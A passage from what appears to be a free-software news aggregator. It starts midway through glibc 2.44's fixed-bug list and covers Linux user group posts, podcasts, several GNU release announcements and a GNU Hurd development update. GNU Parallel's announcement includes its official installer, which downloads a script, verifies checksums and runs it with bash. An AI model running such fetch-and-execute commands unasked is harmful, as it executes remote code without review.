  [34064] dynamic-link: The unnecessary PT_NOTE check in when loading a
    binary
  [34069] network: Buffer overread in ns_sprintrrf with corrupted RDATA
    field (CVE-2026-6238)
  [34070] hurd: Calling open ("/dev/tty/", O_RDONLY) causes the program
    to segfault
  [34073] regex: regexec can mistakenly match with backrefs and the $
    anchor
  [34079] dynamic-link: THP segment load aligns all PT_LOAD segments to
    THP page size
  [34080] dynamic-link: Support THP segment load with THP enabled with
    madvise
  [34083] dynamic-link: __get_thp_mode and __get_thp_size are called
    twice
  [34090] libc: wordexp WRDE_APPEND rollback restores stale we_wordv,
    leading to invalid free in wordfree
  [34098] libc: Missing SUPPORT_STATIC_PIE in arm32
  [34129] string: x86: Non-temporal memset unreachable on AMD Zen 3/4/5
  [34144] libc: ld.so clobbers VFP registers during runtime linking
  [34154] network: Segfault in sock_eq after res_init() returns -1, due
    to stale _u._ext.nscount in __res_iclose
  [34156] dynamic-link: dlsym(RTLD_DEFAULT, ...) from a constructor
    SIGSEGVs when tail-called
  [34164] dynamic-link: elf: IFUNC resolvers do not see static TLS
    initialization
  [34170] dynamic-link: elf:  IFUNC resolver reading global-
    dynamic/TLSDESC __thread variable crashes inside __tls_get_addr
  [34183] math: fma produces wrong results
  [34192] nptl: pthread_setname_np opens /proc/<tid>/comm with O_RDWR
    instead of O_WRONLY|O_CLOEXEC
  [34196] libc: elf: static dlopen: pointer guard of the loaded
    ld.so/libc.so is left uninitialized
  [34197] dynamic-link: elf: Stack canary and pointer guard are
    recoverable from AT_RANDOM (getauxval)
  [34205] libc: aarch64: SIGSEGV in tunable_strcmp in static-pie
    binaries run with a string tunable
  [34208] stdio: scanf not pushback after matching failure
  [34210] libc: elf/tst-glibc-hwcaps-prepend-cache fails on
    armv7a-unknown-linux-gnueabihf
  [34236] locale: Non-representable transliteration still causes iconv
    to exit with 1 if TRANSLIT is specified
  [34289] network: ns_sprintrrf uses p_class, p_type internally
  [34311] build: THP tests failed to link
  [34347] libc: Incorrect trailing bitfield word of struct tcp_info
  [34348] dynamic-link: FAIL: elf/tst-thp-1 if THP is disabled in kernel
  [34351] build: Random test failures
  [34355] build: [2.44 Regression] "make check -j7 subdirs=stdio-common"
    no longer works
  [34396] libc: sparc64-unknown-linux-gnu , Gentoo: >200 test failures,
    SIGILL in many binaries
  [34398] string: Truncated strncpy on s390x z900 ifunc variant

Release Notes
=============

https://sourcewar ... wiki/Release/2.44

Contributors
============

This release was made possible by the contributions of many people.
The maintainers are grateful to everyone who has contributed
changes or bug reports.  These include:

Adam Yi
Adhemerval Zanella
Alejandro Colomar
Andreas K. Hüttel
Andreas Schwab
Arjun Shankar
Aurelien Jarno
Avinal Kumar
Brian Jorgensen
Carlos O'Donell
Carlos Peón Costa
Charlotte Mcmenamin
Collin Funk
Cosmina Dunca
DJ Delorie
Daan De Meyer
Deng Jianbo
Dev Jain
Diego Nieto Cid
Dmitry Kovalenko
Dylan Fleming
Etienne Brateau
Fabian Rast
Florian Weimer
Frédéric Bérat
Garccez
George Hu
H.J. Lu
Jakub Jelinek
Jiamei Xie
Jiho Lee
Jiri Stransky
John David Anglin
Jonathan Wakely
Josef Johansson
Joseph Myers
Justus Winter
Luca Boccassi
Lucas Chollet
Martin Coufal
Matt Turner
Michael Ford
Michael Jeanson
Michael Kelly
Mike FABIAN
Mike Kelly
Muhammad Kamran
Nicolas Boulenguez
Paul Eggert
Peter Bergner
Peter Collingbourne
Petr Menšík
Pierre Blanchard
Pino Toscano
Pádraig Brady
Richard Wild
Rocket Ma
RyotaSaito
Sachin Monga
Sajan Karumanchi
Sam James
Samuel Balazi
Samuel Thibault
Sana Kazi
Sergey Kolosov
Shamil Abdulaev
Shengwen Cheng
Siddhesh Poyarekar
Stefan Liebler
Thomas Daubney
Tomasz Kamiński
Uros Bizjak
WANG Rui
Weihong Ye
Weixie Cui
Wilco Dijkstra
Xi Ruoyao
Xiang Gao
Yao Zihong
Yunze Zhu
Yury Khrustalev
Zihong Yao
mengqinggang
xiejiamei
zombie12138

We would like to call out the following and thank them for their
tireless patch review:

Adhemerval Zanella
Andreas K. Hüttel
Arjun Shankar
Aurelien Jarno
caiyinyu
Carlos O'Donell
Collin Funk
DJ Delorie
Florian Weimer
Frédéric Bérat
Ganesh Gopalasubramanian
H.J. Lu
JiangNing
Mathieu Desnoyers
Paul Eggert
Paul Zimmermann
Peter Bergner
Sam James
Samuel Thibault
Siddhesh Poyarekar
Stefan Liebler
Sunil K Pandey
Wilco Dijkstra
Yury Khrustalev

  •  

OrvietoLug - Come creare un servizio systemd (.service): guida completa

Impara a creare il tuo primo servizio systemd. Guida pratica alla realizzazione di un file .service, alla sua installazione e gestione con systemctl.

L'articolo Come creare un servizio systemd (.service): guida completa proviene da Orvieto Linux User Group | Promozione software libero a Orvieto.

...
  •  

2.5 Admins 309: Orbital Sauron

A new HTTP caching standard looks promising but might struggle to get adopted, a terrible space mirror idea is actually happening, cars will spy on us all, and picking a VPN for use with an IP that doesn’t change very often.

 

Plug

Support us on patreon and get an ad-free RSS feed with some early episodes

 

News/discussion

HTTP gets a QUERY method so complex searches can stop pretending to be POST

FCC grants approval for sun-reflecting space mirror that’s been widely criticized by astronomers

Feels like all of us need to pay way more attention to the new rules affecting EU and US folk, requiring all new cars to include a driver monitoring camera aimed at your face

 

Free consulting

We were asked about picking a VPN for use with an IP that doesn’t change very often.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

health @ Savannah: GNU Health en la facultad de Ciencias Sociales de la Universidad de Buenos Aires

Los próximos días 5, 6 y 7 de agosto tendrán lugar las XVII Jornadas Nacionales de Debate Interdisciplinario en Salud y Población “Investigar e intervenir en salud en tiempos de negacionismos y retrocesos”, organizadas por el Área de Salud y Población del Instituto de Investigaciones Gino Germani de la Facultad de Ciencias Sociales de la Universidad de Buenos Aires (UBA).

Luis Falcón (GNU Solidario) junto al Dr. Fernando Sassetti (UNER) presentarán en la sección "Desigualdades Sociales de la Salud", con el título "Software Libre como modelo de equidad, privacidad, soberanía tecnológica y sostenibilidad en salud. El caso de GNU Health".

Para la comunidad de GNU Health es un privilegio y un honor ser parte de este tan importante evento que lucha por la dignidad del individuo y de la comunidad, por un sistema sanitario público, de calidad y universal. Un sistema y un derecho hoy seriamente  comprometido y amenazado por las grandes corporaciones financieras y tecnológicas.

Haciendo alusión al título de las jornadas, la comunidad GNU y la filosofía del Software Libre representan el faro moral para Investigar e intervenir en salud en tiempos de negacionismos y retrocesos.

¡Nos vemos en Buenos Aires!

  •  

OrvietoLug - Distribuzioni Linux Atomic (Immutable): cosa sono e perché stanno cambiando il modo di usare Linux

Scopri cosa sono le distribuzioni Linux Atomic o Immutable, come funzionano, quali vantaggi offrono e perché rappresentano il futuro di molte distribuzioni Linux.

L'articolo Distribuzioni Linux Atomic (Immutable): cosa sono e perché stanno cambiando il modo di usare Linux proviene da Orvieto Linux User Group | Promozione software libero a Orvieto.

...
  •  

OrvietoLug - Come ridurre il consumo di risorse su Linux: monitoraggio, servizi e priorità dei processi

Guida pratica per ottimizzare il consumo di risorse su Linux:
monitoraggio, servizi di sistema e priorità dei processi con comandi
semplici e sicuri.

L'articolo Come ridurre il consumo di risorse su Linux: monitoraggio, servizi e priorità dei processi proviene da Orvieto Linux User Group | Promozione software libero a Orvieto.

...
  •  

FLUG - Riunione operativa del 17/07/2026

Venerdì 17 luglio 2026 alle 21:00 si terrà una riunione operativa del FLUG nei pressi del locale all'aperto Ultravox, situato nel prato della Tinaia nel parco delle Cascine. La consumazione non è obbligatoria. Ordine del giorno: accordo con ElsaGLUG per riunioni per il prossimo Linux Day; verifica dei contatti da (ri)prendere per gli interventi previsti … Continua la lettura d...
  •  

OrvietoLug - Systemd troubleshooting: come diagnosticare un servizio che non parte con systemctl e journalctl

Una guida pratica per capire perché un servizio systemd
fallisce, leggere i log corretti e riportarlo online con systemctl,
journalctl e systemd-analyze.

L'articolo Systemd troubleshooting: come diagnosticare un servizio che non parte con systemctl e journalctl proviene da Orvieto Linux User Group | Promozione software libero a Orvieto.

...
  •  

FediLUG Italia - Nuova vita per un vecchio PC: le 5 distro Linux più leggere

Hai un PC fermo in un angolo troppo lento per Windows 11 ma ancora perfettamente sano? Prima di buttarlo fermati un attimo: probabilmente non serve un computer nuovo, serve solo un sistema operativo che lo tratti con più leggerezza.

Le distribuzioni Linux leggere nascono esattamente per questo, sfruttare al

  •  

FLUG - ICFP Contest 2026

La rete di collettivi Studenti di Sinistra e in particolare il LILiK ci segnalano l'iniziativa ICFP Contest, che si svolgerà dal 24 al 27 luglio 2026 presso il Dipartimento di Matematica "Ulisse Dini" dell'Università di Firenze. Segue il comunicato ufficiale. Dal 24 al 27 luglio 2026, il Dipartimento di Matematica "Ulisse Dini" dell'Università di Firenze … Continua la lettura ...
  •  

FLUG - Chiusura lista flug-tech

In seguito alla proposta inviata a marzo 2026 a entrambe le liste (flug e flug-tech), la lista flug-tech è stata chiusa con l'unanimità dei partecipanti alla decisione. Con l'occasione è stata rinominata la dicitura della lista principale da La lista di discussione del Firenze Linux User Group a Firenze Linux User Group. Motivi La lista … Continua la lettura di Chiusura lista ...
  •  

Luccalug - Serata a tema: Parallel Computing su GPU

Sabato 27 giugno, a partire dalle 16:30 in poi, vi aspettiamo per una serata a tema dedicata al parallel computing, presentata dal nostro membro Massimiliano Ghilardi.

Scopriamo insieme come sfruttare il parallelismo delle GPU per migliorare le prestazioni del nostro software. Com’è fatto l’hardware e il software alla base dell’intelligenza artificiale?

Programma d...
  •  

FLUG - Riunione posthackmeeting del 22/06/2026

Dopo l'hackmeeting abbiamo deciso di ritrovarci per fare il punto della manifestazione e dei contatti che abbiamo preso. Ci vedremo lunedì 22 giugno 2026 alle 21:00 nei pressi dell'locale all'aperto Ultravox, situato nel prato della Tinaia nel parco delle Cascine. La consumazione non è obbligatoria. Resoconto Rimaneggiamento del messaggio di Leandro in lista. Proseguono i … Continu...
  •  

PLUG - Cena Sociale PLUG 2026

Quest’anno, 2026, il Prato Linux User Group ha compiuto un’intera rotazione attorno al sole come associazione* dopo anni di assenza sul territorio. L’evento non poteva che essere celebrato con gli amici vecchi e nuovi che ci hanno aiutato a crescere.

Abbiamo dunque organizzato una cena sociale per il compleanno del PLUG inviando un invito a tutti i LUG della Toscana, al quale hanno...

  •  

Luccalug - Come eravamo: una macchina del tempo per il sito del LuccaLUG

Il nuovo sito appena andato online ma ci siamo già affezionati a questa estetica un po’ anni ‘90, fatta di marquee che scorrono, font a pixel e contatore delle visite. Ma mentre lo costruivamo ci è venuta una curiosità: quanti siti ha avuto il LuccaLUG in tutti questi anni?

Tanti. Tantissimi. Uno per ogni moda del web che è passata di qui dal 2007 a oggi. Così abbiamo fa...

  •  

osip @ Savannah: osip2 [5.3.2]

A new security release was published today! A minor Out-of-bounds Read was discovered. And fixed!

No confidential impact is possible.
A very low risk of crash is possible.

Enjoy & update!
Aymeric

  •  

parallel @ Savannah: GNU Parallel 20260722 ('Chat Control') released [stable]

GNU Parallel 20260722 ('Chat Control')  has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

  gnu parallelすごい!!!
    -- たらたら@nosennyuu@twitter

New in this release:

  • Bug fixes and man page updates.



GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.


About GNU Parallel


GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.

If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.

GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.

For example you can run this to convert all jpeg files into png and gif files and have a progress bar:

  parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif

Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:

  find . -name '*.jpg' |
    parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200

You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/

You can install GNU Parallel in just 10 seconds with:

    $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
       fetch -o - http://pi.dk/3 ) > install.sh
    $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
    12345678 c555f616 391c6f7c 28bf9380 44f4ec50
    $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
    70727536 3428aa9e 9a136b9a 7296dfe4
    $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
    83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
    b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
    $ bash install.sh

Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1

Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.

When using programs that use GNU Parallel to process data for publication please cite:

O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.

If you like GNU Parallel:

  • Give a demo at your local user group/team/colleagues
  • Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
  • Get the merchandise https://gnuparall ... igns/gnu-parallel
  • Request or write a review for your favourite blog or magazine
  • Request or build a package for your favourite distribution (if it is not already there)
  • Invite me for your next conference


If you use programs that use GNU Parallel for research:

  • Please cite GNU Parallel in you publications (use --citation)


If GNU Parallel saves you money:



About GNU SQL


GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.

The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.

When using GNU SQL for a publication please cite:

O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.


About GNU Niceload


GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

  •  

Late Night Linux – Episode 395

Some of the tech from early on in our lives that inspired where we are today. Plus discoveries including and old game that doesn’t work, professional audio hardware that now works on Linux, Arch on easy mode, and an old chip that can do a surprising amount.

 

Discoveries

Celebrating 55 years of the 555 timer chip (flashing alert)

open-apollo

Ovine

EndeavourOS

 

 

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with some early episodes

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

GNUnet News: libgnunetchat 0.8.0

libgnunetchat 0.8.0 released

We are pleased to announce the release of libgnunetchat 0.8.0.
This is a minor new release bringing compatibility with the major changes in latest GNUnet release 0.28.0. Some minor issues in the API got fixed. Additionally the library was updated to make use of the newer PILS service and an additional layer of encryption for shared files got removed. It is intended to rely on the encryption layer of the FS service in GNUnet for that in the future to reduce overall complexity.

Older releases of the applications using libgnunetchat stay compatible with this release.

Download links

The GPG key used to sign is: 3D11063C10F98D14BD24D1470B0998EF86F59B6A

Note that due to mirror synchronization, not all links may be functional early after the release. For direct access try http://ftp.gnu.org/gnu/gnunet/

Noteworthy changes in 0.8.0

  • Remove additional file encryption layer besides FS implicit layer
  • Fix issue creating duplicate contexts/chats for individual contacts

A detailed list of changes can be found in the ChangeLog .

  •  

GNU Hurd development blog: 2026-q2

Hello and welcome to another Qoth! Here's what's been happening in Q2 of 2026!

Joshua Branson added a pretty cool svg logo for our ethernet multiplexor. He built that image with Inkscape whilst using a Hurd laptop (Thinkpad 420) running on real iron! The Hurd wiki could certainly use more artwork. Perhaps you have a favorite Hurd translator that you believes needs some artwork!

Sergey Bugaev announced his WIP 9pfs (source code), and it has a wiki page! He writes:

Some years ago, I experimented with implementing a 9P translator for
the Hurd. Hopefully there is no need to tell this list what 9P is :)

Besides just browsing files on the few existing servers out there, a
potential use case is virtio-9p, to enable shared directory trees
between VMs and the host. But that would need someone to implement
virtio support in the Hurd.

I wanted to complete 9pfs before publishing, but that ultimately
didn't happen, so now it's time to turn it over to the community. I
now went and made the repository public on GitHub:
https://github.com/bugaevc/9pfs

What's implemented is basic browsing (readdir, stat), path resolution
(dir_lookup), and reading files (io_read). And below that, the whole
tracking for nodes, peropens, protids, fids, tags, and 9p RPCs.

Improvements are welcome, send patches to this list with [PATCH 9pfs]
in the subject. A good starting point would be to continue porting
things that I had implemented in the old netfs-based version (see
netfs.c) but didn't yet port to the new one.

He then got a little more motivated, and he added some write support!

Etienne Brateau added validation to msync, so that the Hurd better follows POSIX.

Diego Nieto Cid worked on allowing privileged users to set their task priority (nice value). His patches landed in glibc and GNU Mach. He also fixed a tiny bug in our test suite. He fixed an adjtime bug, which is helpful to the OpenNTPD port, and he fixed two more bugs.

Paulo Duarte sent a RFC patch series trying to commit Sergey’s previous AArch64 work. He writes:

This series adds the gnumach kernel-side implementation for the
aarch64 ABI Sergey landed in April 2024, plus the test-suite arms.
Patch 01 brings in the aarch64-only sources from bugaevc/wip-aarch64
verbatim, with Sergey as Author; the rest is mine.

The meaningful divergence from wip-aarch64 is what I left out:
roughly 150 files of cross-arch refactoring across kern/, ipc/, vm/,
device/intr.{c,h}, and the i386 tree. Each got replaced with a
smaller per-arch shim under aarch64/ so kern/bootstrap.c,
device/intr.{c,h}, kern/lock.h, and the i386 trees all stay
bit-identical to current master. The shared-file footprint outside
aarch64/ is four files: a new ELF constant, two missing decls plus
their include, and a linker-symbol filter extension...

Tested: 12/12 pass on x86_64, i686, and aarch64 under qemu. No
bare-metal validation yet. I plan to build bootable images and boot
the kernel on Apple M1 / Raspberry Pi (aarch64) and an x86_64 box
(x86_64 + i686). Help on any of these welcome.

He also fixed a tiny cross compilation issue.

gfleury fixed some tmpfs typos. He also fixed a kernel crash on a null pointer deference.

Almudena Garcia is developing a WIP trivfs implementation in rust. The work is not complete yet, but it is possible to write Hurd translators in Rust!

Mikhail Karpov added some checks for mmap in several places. He also worked on adding storeio to the bootstrap chain. This is actually quite interesting. Currently the Hurd sets device entries in /dev/ statically. For example, I am writing this qoth on a Hurd machine that is using two /dev/ entries for my filesystem: /dev/wd0s1 for swap and /dev/wd0s5 for my root filesystem. However, /dev/wd0s1 through /dev/wd0s16 exist on my computer! Once Mikhail's project is done, then the Hurd will dynamically populate SATA devices at boot time! No more need for static translators! He writes:

I've expanded the functionality of the partfs translator to work
with multiple disks and their partitions. Thus, by running the
command:
settrans -c partfs /hurd/partfs /root/disk1.img /root/disk2.img /root/disk3.img


The translator directory will have the following directory tree:
partfs
├── 0
│ ├── 1
│ ├── 2
│ └── ...
├── 1
│ ├── 1
│ ├── 2
│ └── ...
├── 2
│ ├── 1
│ ├── 2
│ └── ...
Since the disks are directories, the cd and ls commands work in the translator node.

I also tested mounting, reading, and writing using the commands:
`settrans -c ext01 /hurd/ext2fs -w -T typed file:/root/partfs/0/1`
and
`settrans -c ext1_1 /hurd/ext2fs -w -T typed part:1:file:/root/partfs/1`

It actually is even cooler! Samuel (our fearless leader) is seeking feedback for how to name these newer /dev entries. Samuel writes:

One thing that would be really needed for efficiency is to implement
netfs_file_get_storage_info, so that libstore would be able to get the
underlying storage information, and directly get data from there rather
than partfs having to pass data with io_read/write.

I'm then wondering how this would fit in the "grand scheme". Our current
approach, /dev/hd0s* being always there, is indeed not really good
because it doesn't easily tell the user which partitions are actually
there. We used to have to have this because partitions used to be
handled by the kernel, and then we have moved to
storerio+parted-supported partitions, which brings much more
flexibility.

Perhaps we could use

settrans -c /dev/hd0s /hurd/partfs /dev/hd0

and then we'd have /dev/hd0s/1, which is almost like before, but allows
the entries to be dynamic. Actually, we could even have some

settrans -c /dev/hd /hurd/probedisk hd

and then we'd have /dev/hd/0, and we could have /dev/hd/0s being partfs,
so we'd eventually have

/dev/hd/0s/1

But I'm also thinking that perhaps it could be integrated more with
storeio, i.e. /dev/hd0 can as well also act as a directory with partfs
behavior, so you could have

/dev/hd0/1

and with the probedisk translator, you could have

/dev/hd/0/1

What do people think about it?

Mike Kelly has been hard at work porting OpenBSD’s OpenNTPD, which required some glibc work. The Hurd doesn't currently have a NTP daemon, so thanks Mike!

He also debugged a weird memory error with rump, and he provided a "brown-tape" solution for it. Hopefully, he (or you dear reader), can reach out to the NetBSD people to fix this bug. This just goes to show that when two projects use the same code, both projects benefit!

He also got a glibc patch committed. Essentially SIGSTOP/SIGCONT was duplicating portions of files, which is now fixed. However, there are still some other issues with building some haskell packages.

Joan Lledó continued his work on porting dhcpcd. Also Roy Maples, the dhcpcd maintainer did a lot of helpful work to help us out. Thanks Roy!

Bradley Morgan fixed a tiny implementation bug with cat. He also tweaked procfs to show hidden files, and he allowed passing “-s” to init. Previously, passing "-s" to init was silently ignored.

Johannes Schauer Marin Rodrigues has been working on getting s-build to run on amd64 Hurd. It is a rather long email thread, so grab some popcorn and dig in!

Milos Nikic ported Neovim. He also worked on bug fixes to libdiskfs, and he fixed a deadlock bug in the “ext3/ext4” filesystem journal.

In the last qoth we had talked about how the Milos was working on adding an ext3/ext4 binary compatible journal. Samuel has committed it! Samuel wrote:

There is a couple things that I fixed on the fly:

- We want to use pthread_cond_clockwait rather than
  pthread_cond_timedwait, to be able to use CLOCK_MONOTONIC instead of
  CLOCK_REALTIME, to avoid being hit by ntpdate and such.

- In diskfs_S_dir_rename, there was an addition of:

  pthread_mutex_unlock (&fnp->lock);

  which was clearly bogus: we were unlocking it again below.

There are a couple things that we'd want to fix now:

- when calling diskfs_file_update, don't we have to be inside a
  transaction? Otherwise if we pass wait=1 and use a journal, we won't
  be waiting AIUI? Notably, in diskfs_S_dir_rmdir we don't use a
  transaction. And ideally we'd have an assertion that makes sure we
  respect this.

- we should define some helper for this recurring pattern:

  if ((docommit) && (diskfs_synchronous || diskfs_journal_needs_sync (txn)))
    diskfs_journal_commit_transaction (txn);
  else
    diskfs_journal_stop_transaction (txn);

- journal_drain_deferred_blocks should document what it does, not just
  its call conditions :), and more generally the functions that are
  not already documented in a .h and not just a _locked variant of a
  documented function.

Leonardo Lopes Pereira did some spring cleaning to remove some dead code.

Samuel Thibault mentioned in an email that the Hurd can support nvmes with rump, but that the work was just not done yet. Perhaps you, dear reader, would like to help us accomplish this task?

The mysterious user yelini worked on porting the D language compiler.

Damien Zammit worked on tweaking the Hurd’s WIP CI. He also fixed several bugs to make it possible to run the Hurd’s test suite from GNU/Linux running on an AArch64 computer. He also is working on integrating qemu’s Hurd support into upstream qemu’s CI, so that the support does not bitrot.

Sophiel Zhou fixed a tiny pfinet permission checking issue and taught pfinet to not fail under memory pressure:

This series fixes two latent crash bugs in pfinet where mmap
return values go unchecked, may causing crash when memory is tight.

Both bugs follow the same pattern: mmap is called to grow a buffer,
but the returned pointer is dereferenced before (or without) checking
for MAP_FAILED.  Under normal operation mmap rarely fails, so these
have gone unnoticed, but under address-space pressure pfinet would
crash.
  •  

GNUnet News: GNUnet 0.28.0

GNUnet 0.28.0 released

We are pleased to announce the release of GNUnet 0.28.0.
GNUnet is an alternative network stack for building secure, decentralized and privacy-preserving distributed applications. Our goal is to replace the old insecure Internet protocol stack. Starting from an application for secure publication of files, it has grown to include all kinds of basic protocol components and applications towards the creation of a GNU internet.

This is a new major release. Major versions may break protocol compatibility with the 0.27.X versions. Please be aware that Git master is thus henceforth (and has been for a while) INCOMPATIBLE with the 0.27.X GNUnet network, and interactions between old and new peers will result in issues. In terms of usability, users should be aware that there are still a number of known open issues in particular with respect to ease of use, but also some critical privacy issues especially for mobile users. Also, the nascent network is tiny and thus unlikely to provide good anonymity or extensive amounts of interesting information. As a result, the 0.28.0 release is still only suitable for early adopters with some reasonable pain tolerance .

Download links

  • gnunet-0.28.0.tar.gz ( signature )
  • The GPG key used to sign is: 3D11063C10F98D14BD24D1470B0998EF86F59B6A

    Note that due to mirror synchronization, not all links might be functional early after the release. For direct access try http://ftp.gnu.org/gnu/gnunet/

    Changes

    A detailed list of changes can be found in the git log, the NEWS.

    Known Issues

    • There are known major issues with the TRANSPORT subsystem.
    • There are known moderate implementation limitations in CADET that negatively impact performance.
    • There are known moderate design issues in FS that also impact usability and performance.
    • There are minor implementation limitations in SET that create unnecessary attack surface for availability.
    • The RPS subsystem remains experimental.

    In addition to this list, you may also want to consult our bug tracker at bugs.gnunet.org which lists about 190 more specific issues.

    Thanks

    This release was the work of many people. The following people contributed code and were thus easily identified: Christian Grothoff, Florian Dold, TheJackiMonster, and Martin Schanzenbach.

  •  

2.5 Admins 308: Sloppy Shims

Microsoft really wants your Windows settings data, secure boot has been useless for a decade, our thoughts on (the idea of) Incus and IncusOS, and configuring ZFS for a Lightning Memory Mapped Database.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Jails, Not Containers: FreeBSD Isolation Done Right

 

News/discussion

Microsoft flips Windows Backup to on by default unless you’re in the EU

Microsoft’s Secure Boot has been broken for a decade and no one noticed until now

IncusOS

Incus

 

Free consulting

We were asked about configuring ZFS for a Lightning Memory Mapped Database.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

libtool @ Savannah: libtool-2.6.2 released [stable]

Libtoolers!

The Libtool Team is pleased to announce the release of libtool 2.6.2.

GNU Libtool hides the complexity of using shared libraries behind a
consistent, portable interface. GNU Libtool ships with GNU libltdl, which
hides the complexity of loading dynamic runtime libraries (modules)
behind a consistent, portable interface.

See the NEWS below for a brief summary.

Thanks to everyone who has contributed!
The following people contributed changes to this release:

libtool 2.6.2 [stable]:
  Ileana Dumitrescu (4)

libtool 2.6.1 [beta]:
  Alexandre Janniaux (4)
  Alexey Samsonov (1)
  Anthony Mallet (1)
  Arnold (1)
  Dima Pasechnik (1)
  Frederic Berat (1)
  Ileana Dumitrescu (15)
  KO Myung-Hun (4)
  Kirill Makurin (1)
  Mintsuki (1)
  Nicolas Boulenguez (1)
  Olly Betts (1)
  Patrice Dumas (1)
  Richard J. Mathar (1)

libtool 2.6.0 [alpha]:
  Anthony Mallet (1)
  Bruno Haible (2)
  Christian Feld (1)
  Collin Funk (1)
  Elizabeth Figura (1)
  Evgeny Grin (1)
  Frédéric Bérat (1)
  Gleb Popov (1)
  Ileana Dumitrescu (47)
  Julien ÉLIE (1)
  Karl Berry (1)
  Kirill Makurin (1)
  Manoj Gupta (1)
  Martin Storsjö (1)
  Michael Haubenwallner (2)
  Mintsuki (1)
  Mitch (1)
  Pierre Ossman (2)
  Takashi Yano (1)


Ileana
 [on behalf of the libtool maintainers]
==================================================================

Here is the GNU libtool home page:
    https://gnu. ... g/s/libtool/

Here are the compressed sources:
  https://ftpmirror ... tool-2.6.2.tar.gz   (2.1MB)
  https://ftpmirror ... tool-2.6.2.tar.xz   (1.1MB)

Here are the GPG detached signatures:
  https://ftpmirror ... -2.6.2.tar.gz.sig
  https://ftpmirror ... -2.6.2.tar.xz.sig

Use a mirror for higher download bandwidth:
  https://www.gnu.o ... rg/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

  File: libtool-2.6.2.tar.gz
  SHA256 sum:   24adb3aa9ae035c70faba344af57d73215eb89281045af6c7ccd307751f8b0bf
  SHA3-256 sum: b0e77c0dc9a082830c95d182da77747d1f5435a06132feefd5054bfde2c9da81

  File: libtool-2.6.2.tar.xz
  SHA256 sum:   2ef1067c16c97db930fd740cc9bc3d3ba9a583804ae5ac42cc3e8719e49e191e
  SHA3-256 sum: c24b9995af8391a310a258dcb98897f92d86f47acca235f3d2859ca0ed1d9dd0

Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.

Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

  gpg --verify libtool-2.6.2.tar.gz.sig

The signature should match the fingerprint of the following key:

  pub   rsa4096 2021-09-23 [SC]
        FA26 CA78 4BE1 8892 7F22  B99F 6570 EA01 146F 7354
  uid   Ileana Dumitrescu <ileanadumitrescu95@gmail.com>
  uid   Ileana Dumitrescu <ileanadumi95@protonmail.com>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

  gpg --locate-external-key ileanadumitrescu95@gmail.com

  gpg --recv-keys 6570EA01146F7354

  wget -q -O- 'https://savannah. ... ol&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

  wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
  gpg --keyring gnu-keyring.gpg --verify libtool-2.6.2.tar.gz.sig

This release is based on the libtool git repository, available as

  git clone https://https.git ... g/git/libtool.git

with commit 309bb53a8adfb22c6e5869cc8da049bf123e5438 tagged as v2.6.2.

For a summary of changes and contributors, see:

  https://gitweb.gi ... shortlog;h=v2.6.2

or run this command from a git-cloned libtool directory:

  git shortlog v2.6.1..v2.6.2

This release was bootstrapped with the following tools:
  Autoconf 2.73
  Automake 1.18.1
  Gnulib 2026-07-03 491f1bb7d3049f3ab7825f3ee665c209658e9965

NEWS

  • Noteworthy changes in release 2.6.2 (2026-07-16) [stable]


  Please see beta release 2.6.1 and alpha release 2.6.0 for a list of
  release changes.


  • Noteworthy changes in release 2.6.1 (2026-06-04) [beta]


** New features:

  - Pass 'resource-dir=*' flag for Clang.

